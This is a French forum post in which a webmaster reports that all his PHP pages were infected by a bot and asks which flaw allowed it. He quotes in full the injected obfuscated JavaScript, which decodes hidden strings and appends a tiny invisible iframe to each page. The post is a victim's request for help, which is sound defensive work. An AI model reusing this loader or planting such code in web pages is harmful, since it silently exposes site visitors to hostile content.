zeOffspring | Bonjour à tous,
Après une rapide recherche dans le forum, je n'ai pas trouvé de sujet concernant ma question.
Je possède un site intégralement fait en PHP maison (pas de framework) et hébergé chez OVH.
Hier, je me suis rendu compte que toutes mes pages contenant une minuscule iframe ajoutée par un robot.
En voici le code :
Code :
- <body class="page"> <kJNPAGyUfwlpmhli1o6kENwBUZTINEoUZ5KH6vuxrkQU5><script>function KfaNOQGmkA(QTCvLAKt){return QTCvLAKt.split(new String()).reverse().join(new String());}function eKnkhTmkgvU(IudgMsRyLmBV,ZgSTmGXZfLDTL){var iGMoXZukcDgHKADzaK=null;if(IudgMsRyLmBV==iGMoXZukcDgHKADzaK||IudgMsRyLmBV.length<8){return;}if(ZgSTmGXZfLDTL==iGMoXZukcDgHKADzaK||ZgSTmGXZfLDTL.length<=0){return;}var pEChMvpqCk="";for(var NrQWIkTLnvVkoac=0;NrQWIkTLnvVkoac<ZgSTmGXZfLDTL.length;NrQWIkTLnvVkoac++){pEChMvpqCk+=ZgSTmGXZfLDTL.charCodeAt(NrQWIkTLnvVkoac).toString();}var OttbmSmsBBm=Math.floor(pEChMvpqCk.length/5);var OoNEppSPr=parseInt(pEChMvpqCk.charAt(OttbmSmsBBm)+pEChMvpqCk.charAt(OttbmSmsBBm*2)+pEChMvpqCk.charAt(OttbmSmsBBm*3)+pEChMvpqCk.charAt(OttbmSmsBBm*4)+pEChMvpqCk.charAt(OttbmSmsBBm*5));var LosqKCWWCCdEfIseA=Math.round(ZgSTmGXZfLDTL.length/2);var zWlAUxwUohnqOb=Math.pow(2,31)-1;var wknzvpwvpTcPTTiqEu=parseInt(IudgMsRyLmBV.substring(IudgMsRyLmBV.length-8,IudgMsRyLmBV.length),16);IudgMsRyLmBV=IudgMsRyLmBV.substring(0,IudgMsRyLmBV.length-8);pEChMvpqCk+=wknzvpwvpTcPTTiqEu;while(pEChMvpqCk.length>10){pEChMvpqCk=(parseInt(pEChMvpqCk.substring(0,10))+parseInt(pEChMvpqCk.substring(10,pEChMvpqCk.length))).toString();}pEChMvpqCk=(OoNEppSPr*pEChMvpqCk+LosqKCWWCCdEfIseA)%zWlAUxwUohnqOb;var yntCTBVqZw="";var LkieMTDEOBiMRL="";for(var TryGsmbCpqOQpAOpU=0;TryGsmbCpqOQpAOpU<IudgMsRyLmBV.length;TryGsmbCpqOQpAOpU+=2){yntCTBVqZw=parseInt(parseInt(IudgMsRyLmBV.substring(TryGsmbCpqOQpAOpU,TryGsmbCpqOQpAOpU+2),16)^Math.floor((pEChMvpqCk/zWlAUxwUohnqOb)*255));LkieMTDEOBiMRL+=String.fromCharCode(yntCTBVqZw);pEChMvpqCk=(OoNEppSPr*pEChMvpqCk+LosqKCWWCCdEfIseA)%zWlAUxwUohnqOb;}return LkieMTDEOBiMRL;}IMWuTSHx=document.createElement(KfaNOQGmkA(eKnkhTmkgvU("de454495031205c856a9","wqcARdoRoGydGd" )));IMWuTSHx.setAttribute(KfaNOQGmkA(eKnkhTmkgvU("c8e89502583f47","tEuTceTymPZAyxXS" )),KfaNOQGmkA(eKnkhTmkgvU("34320ab0092a189dc8dba31f1740295669e13e36fd1e480d26450446f67dab6af889698b9949bac36cf615746779f43f5504707545","rRcsMgumrfXLv" )));IMWuTSHx.style.width=KfaNOQGmkA(eKnkhTmkgvU("7f820700ccbd9c","nJHPolvVHcGWFcKBdB" ));IMWuTSHx.style.height=KfaNOQGmkA(eKnkhTmkgvU("45cf0502043b45","oASopzGIEDzRmm" ));document.body.appendChild(IMWuTSHx);</script></kJNPAGyUfwlpmhli1o6kENwBUZTINEoUZ5KH6vuxrkQU5>
|
Un truc moche, pas très lisible à l'oeil nu et ce bout de code a été inséré sur toute mes pages php contenant une balise body.
L'insertion se fait juste après la balide ouvrante.
Ce qui me chagrine vraiment, c'est qu'en passant par Filezilla, je me suis rendu compte que l'intégralité de mon arborescence a été
visitée et que tous les fichiers php/php5 ont été ouverts en écriture.... (j'ai pu les écraser avec les bonnes versions mais bon...)
Est-ce que quelqu'un a déjà subi ce type d'attaque ?
Est-ce que quelqu'un a une idée du type de faille sur laquelle le robot a pu travailler (que je corrige) ?
Merci d'avance pour vos retours !
Seb ---------------
Webmaster http://www.theoffspringsession.com
|